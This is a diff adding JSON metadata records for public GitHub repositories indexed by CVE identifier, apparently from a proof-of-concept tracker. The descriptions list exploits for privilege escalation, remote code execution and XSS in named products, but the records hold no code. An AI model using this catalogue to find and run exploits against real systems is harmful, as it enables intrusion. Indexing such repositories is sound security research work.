1 + }, + { + "id": 517351368, + "name": "CVE-2022-34918-LPE-PoC", + "full_name": "merlinepedra\/CVE-2022-34918-LPE-PoC", + "owner": { + "login": "merlinepedra", + "id": 3269069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3269069?v=4", + "html_url": "https:\/\/github.com\/merlinepedra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merlinepedra\/CVE-2022-34918-LPE-PoC", + "description": null, + "fork": false, + "created_at": "2022-07-24T14:47:55Z", + "updated_at": "2022-07-26T01:51:26Z", + "pushed_at": "2022-07-24T14:48:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517540560, + "name": "CVE-2022-34918", + "full_name": "linulinu\/CVE-2022-34918", + "owner": { + "login": "linulinu", + "id": 98687363, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98687363?v=4", + "html_url": "https:\/\/github.com\/linulinu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/linulinu\/CVE-2022-34918", + "description": null, + "fork": false, + "created_at": "2022-07-25T06:13:41Z", + "updated_at": "2022-07-25T06:15:05Z", + "pushed_at": "2022-07-25T06:20:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520440526, + "name": "CVE-2022-34918", + "full_name": "veritas501\/CVE-2022-34918", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-34918", + "description": "CVE-2022-34918 netfilter nf_tables 本地提权 POC", + "fork": false, + "created_at": "2022-08-02T09:52:02Z", + "updated_at": "2024-08-12T20:25:48Z", + "pushed_at": "2022-09-15T03:19:28Z", + "stargazers_count": 215, + "watchers_count": 215, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 215, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34919.json b/2022/CVE-2022-34919.json new file mode 100644 index 0000000000..3e0a437d76 --- /dev/null +++ b/2022/CVE-2022-34919.json @@ -0,0 +1,33 @@ +[ + { + "id": 525463179, + "name": "CVE-2022-34919", + "full_name": "ahajnik\/CVE-2022-34919", + "owner": { + "login": "ahajnik", + "id": 63816088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63816088?v=4", + "html_url": "https:\/\/github.com\/ahajnik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahajnik\/CVE-2022-34919", + "description": null, + "fork": false, + "created_at": "2022-08-16T16:39:17Z", + "updated_at": "2022-08-22T13:12:26Z", + "pushed_at": "2022-08-16T17:36:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-34970.json b/2022/CVE-2022-34970.json new file mode 100644 index 0000000000..77377bae54 --- /dev/null +++ b/2022/CVE-2022-34970.json @@ -0,0 +1,33 @@ +[ + { + "id": 519029849, + "name": "CVE-2022-34970", + "full_name": "0xhebi\/CVE-2022-34970", + "owner": { + "login": "0xhebi", + "id": 21058883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21058883?v=4", + "html_url": "https:\/\/github.com\/0xhebi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhebi\/CVE-2022-34970", + "description": "Vulnerability in Crow prior v1.0+4", + "fork": false, + "created_at": "2022-07-29T00:19:33Z", + "updated_at": "2022-08-11T03:07:18Z", + "pushed_at": "2022-08-10T23:14:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35131.json b/2022/CVE-2022-35131.json new file mode 100644 index 0000000000..605893aa95 --- /dev/null +++ b/2022/CVE-2022-35131.json @@ -0,0 +1,33 @@ +[ + { + "id": 517543911, + "name": "Joplin-CVE-2022-35131", + "full_name": "ly1g3\/Joplin-CVE-2022-35131", + "owner": { + "login": "ly1g3", + "id": 105918602, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105918602?v=4", + "html_url": "https:\/\/github.com\/ly1g3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ly1g3\/Joplin-CVE-2022-35131", + "description": "Joplin CVE-2022-35131, RCE", + "fork": false, + "created_at": "2022-07-25T06:25:52Z", + "updated_at": "2022-07-26T14:20:45Z", + "pushed_at": "2022-07-25T06:31:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3518.json b/2022/CVE-2022-3518.json new file mode 100644 index 0000000000..28f15f4829 --- /dev/null +++ b/2022/CVE-2022-3518.json @@ -0,0 +1,33 @@ +[ + { + "id": 560380307, + "name": "CVE-2022-3518", + "full_name": "lohith19\/CVE-2022-3518", + "owner": { + "login": "lohith19", + "id": 30563726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30563726?v=4", + "html_url": "https:\/\/github.com\/lohith19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lohith19\/CVE-2022-3518", + "description": null, + "fork": false, + "created_at": "2022-11-01T11:22:21Z", + "updated_at": "2022-11-02T01:04:35Z", + "pushed_at": "2022-11-01T11:23:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35405.json b/2022/CVE-2022-35405.json new file mode 100644 index 0000000000..86ed5ef5d9 --- /dev/null +++ b/2022/CVE-2022-35405.json @@ -0,0 +1,40 @@ +[ + { + "id": 515337808, + "name": "CVE-2022-35405", + "full_name": "viniciuspereiras\/CVE-2022-35405", + "owner": { + "login": "viniciuspereiras", + "id": 69733777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69733777?v=4", + "html_url": "https:\/\/github.com\/viniciuspereiras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viniciuspereiras\/CVE-2022-35405", + "description": "ManageEngine PAM360, Password Manager Pro, and Access Manager Plus unauthenticated remote code execution vulnerability PoC-exploit", + "fork": false, + "created_at": "2022-07-18T20:52:01Z", + "updated_at": "2024-11-18T01:54:52Z", + "pushed_at": "2022-09-27T14:52:32Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-35405", + "exploit", + "java", + "poc", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 11, + "watchers": 29, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35411.json b/2022/CVE-2022-35411.json new file mode 100644 index 0000000000..3b78037d19 --- /dev/null +++ b/2022/CVE-2022-35411.json @@ -0,0 +1,33 @@ +[ + { + "id": 786312081, + "name": "CVE-2022-35411", + "full_name": "fuzzlove\/CVE-2022-35411", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/CVE-2022-35411", + "description": "rpc.py 0.6.0 - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-04-14T04:08:44Z", + "updated_at": "2024-10-15T02:54:38Z", + "pushed_at": "2024-04-25T09:14:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35416.json b/2022/CVE-2022-35416.json new file mode 100644 index 0000000000..5361ce2334 --- /dev/null +++ b/2022/CVE-2022-35416.json @@ -0,0 +1,33 @@ +[ + { + "id": 512999548, + "name": "CVE-2022-35416", + "full_name": "safe3s\/CVE-2022-35416", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2022-35416", + "description": "H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416", + "fork": false, + "created_at": "2022-07-12T04:35:49Z", + "updated_at": "2024-03-06T12:47:23Z", + "pushed_at": "2022-07-12T04:38:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3546.json b/2022/CVE-2022-3546.json new file mode 100644 index 0000000000..dedb9d1d90 --- /dev/null +++ b/2022/CVE-2022-3546.json @@ -0,0 +1,33 @@ +[ + { + "id": 552325321, + "name": "CVE-2022-3546", + "full_name": "thehackingverse\/CVE-2022-3546", + "owner": { + "login": "thehackingverse", + "id": 86924237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86924237?v=4", + "html_url": "https:\/\/github.com\/thehackingverse", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehackingverse\/CVE-2022-3546", + "description": null, + "fork": false, + "created_at": "2022-10-16T10:35:24Z", + "updated_at": "2022-11-20T07:45:32Z", + "pushed_at": "2023-05-10T06:11:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35500.json b/2022/CVE-2022-35500.json new file mode 100644 index 0000000000..c3fc131662 --- /dev/null +++ b/2022/CVE-2022-35500.json @@ -0,0 +1,33 @@ +[ + { + "id": 556807932, + "name": "CVE-2022-35500", + "full_name": "afine-com\/CVE-2022-35500", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-35500", + "description": "Stored Cross-site Scripting (XSS) in leave comment functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T14:52:41Z", + "updated_at": "2022-10-25T00:47:08Z", + "pushed_at": "2022-10-24T15:21:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35501.json b/2022/CVE-2022-35501.json new file mode 100644 index 0000000000..e04e6618bf --- /dev/null +++ b/2022/CVE-2022-35501.json @@ -0,0 +1,33 @@ +[ + { + "id": 556812883, + "name": "CVE-2022-35501", + "full_name": "afine-com\/CVE-2022-35501", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-35501", + "description": "Stored Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T15:02:43Z", + "updated_at": "2022-10-25T00:47:07Z", + "pushed_at": "2022-10-24T15:16:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35513.json b/2022/CVE-2022-35513.json new file mode 100644 index 0000000000..cf68887f6c --- /dev/null +++ b/2022/CVE-2022-35513.json @@ -0,0 +1,39 @@ +[ + { + "id": 510851949, + "name": "CVE-2022-35513", + "full_name": "p1ckzi\/CVE-2022-35513", + "owner": { + "login": "p1ckzi", + "id": 44880203, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2022-35513", + "description": "CVE-2022-35513 | blink1-pass-decrypt", + "fork": false, + "created_at": "2022-07-05T18:27:36Z", + "updated_at": "2022-08-15T02:28:51Z", + "pushed_at": "2022-08-15T08:12:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blink1-pass-decrypt", + "blink1control2", + "cve", + "cve-2022-35513", + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3552.json b/2022/CVE-2022-3552.json new file mode 100644 index 0000000000..ff97619b95 --- /dev/null +++ b/2022/CVE-2022-3552.json @@ -0,0 +1,33 @@ +[ + { + "id": 622192084, + "name": "CVE-2022-3552", + "full_name": "0xk4b1r\/CVE-2022-3552", + "owner": { + "login": "0xk4b1r", + "id": 44284877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44284877?v=4", + "html_url": "https:\/\/github.com\/0xk4b1r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xk4b1r\/CVE-2022-3552", + "description": "BoxBilling<=4.22.1.5 - Remote Code Execution (RCE)", + "fork": false, + "created_at": "2023-04-01T11:53:14Z", + "updated_at": "2024-11-30T21:39:36Z", + "pushed_at": "2023-04-01T15:45:53Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3564.json b/2022/CVE-2022-3564.json new file mode 100644 index 0000000000..f266804024 --- /dev/null +++ b/2022/CVE-2022-3564.json @@ -0,0 +1,33 @@ +[ + { + "id": 691480377, + "name": "linux-4.1.15_CVE-2022-3564", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2022-3564", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2022-3564", + "description": null, + "fork": false, + "created_at": "2023-09-14T09:07:11Z", + "updated_at": "2023-09-14T09:22:05Z", + "pushed_at": "2023-09-14T14:58:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35649.json b/2022/CVE-2022-35649.json new file mode 100644 index 0000000000..20ccaadeb0 --- /dev/null +++ b/2022/CVE-2022-35649.json @@ -0,0 +1,33 @@ +[ + { + "id": 610209003, + "name": "CVE-2022-35649", + "full_name": "antoinenguyen-09\/CVE-2022-35649", + "owner": { + "login": "antoinenguyen-09", + "id": 61876488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61876488?v=4", + "html_url": "https:\/\/github.com\/antoinenguyen-09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antoinenguyen-09\/CVE-2022-35649", + "description": "Payload Generator and Detailed Analysis about CVE-2022-35649 ", + "fork": false, + "created_at": "2023-03-06T10:09:59Z", + "updated_at": "2023-03-20T10:23:25Z", + "pushed_at": "2023-03-07T09:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35698.json b/2022/CVE-2022-35698.json new file mode 100644 index 0000000000..2cf5dd0a2c --- /dev/null +++ b/2022/CVE-2022-35698.json @@ -0,0 +1,38 @@ +[ + { + "id": 551262719, + "name": "Magento-APSB22-48-Security-Patches", + "full_name": "EmicoEcommerce\/Magento-APSB22-48-Security-Patches", + "owner": { + "login": "EmicoEcommerce", + "id": 26820069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26820069?v=4", + "html_url": "https:\/\/github.com\/EmicoEcommerce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EmicoEcommerce\/Magento-APSB22-48-Security-Patches", + "description": "This repository contains potential security patches for the Magento APSB22-48 and CVE-2022-35698 security vulnerability", + "fork": false, + "created_at": "2022-10-14T04:58:26Z", + "updated_at": "2023-02-02T17:52:05Z", + "pushed_at": "2023-06-16T09:32:42Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apsb22-48", + "cve-2022-35698", + "hacktoberfest", + "magento2" + ], + "visibility": "public", + "forks": 11, + "watchers": 39, + "score": 0, + "subscribers_count": 13 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35737.json b/2022/CVE-2022-35737.json new file mode 100644 index 0000000000..601cb6be56 --- /dev/null +++ b/2022/CVE-2022-35737.json @@ -0,0 +1,64 @@ +[ + { + "id": 556829048, + "name": "CVE-2022-35737", + "full_name": "gmh5225\/CVE-2022-35737", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-35737", + "description": "Stranger strings: CVE-2022-35737", + "fork": false, + "created_at": "2022-10-24T15:36:44Z", + "updated_at": "2024-10-23T02:50:02Z", + "pushed_at": "2022-08-03T18:40:15Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604796426, + "name": "codeql-cve-2022-35737", + "full_name": "rvermeulen\/codeql-cve-2022-35737", + "owner": { + "login": "rvermeulen", + "id": 636626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/636626?v=4", + "html_url": "https:\/\/github.com\/rvermeulen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvermeulen\/codeql-cve-2022-35737", + "description": "A CodeQL query to find CVE 2022-35737", + "fork": false, + "created_at": "2023-02-21T20:07:45Z", + "updated_at": "2023-03-09T10:00:52Z", + "pushed_at": "2023-02-21T20:11:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35841.json b/2022/CVE-2022-35841.json new file mode 100644 index 0000000000..f1881ccb00 --- /dev/null +++ b/2022/CVE-2022-35841.json @@ -0,0 +1,33 @@ +[ + { + "id": 536247195, + "name": "CVE-2022-35841", + "full_name": "Wack0\/CVE-2022-35841", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/CVE-2022-35841", + "description": "small writeup on EnterpriseModernAppManager::ProvisionApplication bug", + "fork": false, + "created_at": "2022-09-13T17:53:56Z", + "updated_at": "2023-03-27T09:16:12Z", + "pushed_at": "2022-09-13T18:05:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35899.json b/2022/CVE-2022-35899.json new file mode 100644 index 0000000000..c65cd7e257 --- /dev/null +++ b/2022/CVE-2022-35899.json @@ -0,0 +1,33 @@ +[ + { + "id": 515210387, + "name": "CVE-2022-35899", + "full_name": "angelopioamirante\/CVE-2022-35899", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2022-35899", + "description": "Unquoted Service Path Asus GameSdk", + "fork": false, + "created_at": "2022-07-18T14:06:58Z", + "updated_at": "2022-07-19T05:58:13Z", + "pushed_at": "2022-07-25T13:08:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3590.json b/2022/CVE-2022-3590.json new file mode 100644 index 0000000000..aa458c0960 --- /dev/null +++ b/2022/CVE-2022-3590.json @@ -0,0 +1,64 @@ +[ + { + "id": 652624585, + "name": "CVE-2022-3590-WordPress-Vulnerability-Scanner", + "full_name": "hxlxmjxbbxs\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "owner": { + "login": "hxlxmjxbbxs", + "id": 96540322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96540322?v=4", + "html_url": "https:\/\/github.com\/hxlxmjxbbxs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hxlxmjxbbxs\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "description": " This repository contains a Python script that checks WordPress websites for the CVE-2022-3590 vulnerability, which exploits an unauthenticated blind Server-Side Request Forgery (SSRF) in the WordPress pingback feature.", + "fork": false, + "created_at": "2023-06-12T13:06:54Z", + "updated_at": "2024-12-02T13:52:06Z", + "pushed_at": "2023-06-12T18:25:51Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839637099, + "name": "CVE-2022-3590-WordPress-Vulnerability-Scanner", + "full_name": "huynhvanphuc\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "owner": { + "login": "huynhvanphuc", + "id": 2069803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2069803?v=4", + "html_url": "https:\/\/github.com\/huynhvanphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huynhvanphuc\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "description": null, + "fork": false, + "created_at": "2024-08-08T03:02:05Z", + "updated_at": "2024-08-08T03:03:59Z", + "pushed_at": "2024-08-08T03:03:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35914.json b/2022/CVE-2022-35914.json new file mode 100644 index 0000000000..a2a2eaf809 --- /dev/null +++ b/2022/CVE-2022-35914.json @@ -0,0 +1,250 @@ +[ + { + "id": 543696649, + "name": "CVE-2022-35914-poc", + "full_name": "cosad3s\/CVE-2022-35914-poc", + "owner": { + "login": "cosad3s", + "id": 2116674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2116674?v=4", + "html_url": "https:\/\/github.com\/cosad3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cosad3s\/CVE-2022-35914-poc", + "description": null, + "fork": false, + "created_at": "2022-09-30T16:43:28Z", + "updated_at": "2024-12-23T04:53:31Z", + "pushed_at": "2024-01-02T11:55:38Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 47, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 548258836, + "name": "CVE-2022-35914", + "full_name": "Lzer0Kx01\/CVE-2022-35914", + "owner": { + "login": "Lzer0Kx01", + "id": 88499633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88499633?v=4", + "html_url": "https:\/\/github.com\/Lzer0Kx01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lzer0Kx01\/CVE-2022-35914", + "description": null, + "fork": false, + "created_at": "2022-10-09T07:46:58Z", + "updated_at": "2023-07-30T07:15:24Z", + "pushed_at": "2022-10-09T08:26:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 550214805, + "name": "CVE-2022-35914", + "full_name": "6E6L6F\/CVE-2022-35914", + "owner": { + "login": "6E6L6F", + "id": 87319528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87319528?v=4", + "html_url": "https:\/\/github.com\/6E6L6F", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/6E6L6F\/CVE-2022-35914", + "description": null, + "fork": false, + "created_at": "2022-10-12T11:42:08Z", + "updated_at": "2023-04-26T11:50:10Z", + "pushed_at": "2022-10-12T11:42:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562374810, + "name": "CVE-2022-35914", + "full_name": "0xGabe\/CVE-2022-35914", + "owner": { + "login": "0xGabe", + "id": 68028935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4", + "html_url": "https:\/\/github.com\/0xGabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xGabe\/CVE-2022-35914", + "description": "Unauthenticated RCE in GLPI 10.0.2", + "fork": false, + "created_at": "2022-11-06T06:23:14Z", + "updated_at": "2024-11-29T18:03:47Z", + "pushed_at": "2022-11-06T06:24:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610523538, + "name": "CVE-2022-35914", + "full_name": "Johnermac\/CVE-2022-35914", + "owner": { + "login": "Johnermac", + "id": 115858996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115858996?v=4", + "html_url": "https:\/\/github.com\/Johnermac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Johnermac\/CVE-2022-35914", + "description": "Script in Ruby for the CVE-2022-35914 - RCE in GLPI ", + "fork": false, + "created_at": "2023-03-07T00:07:28Z", + "updated_at": "2023-07-18T00:58:55Z", + "pushed_at": "2023-03-07T00:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791130439, + "name": "CVE-2022-35914", + "full_name": 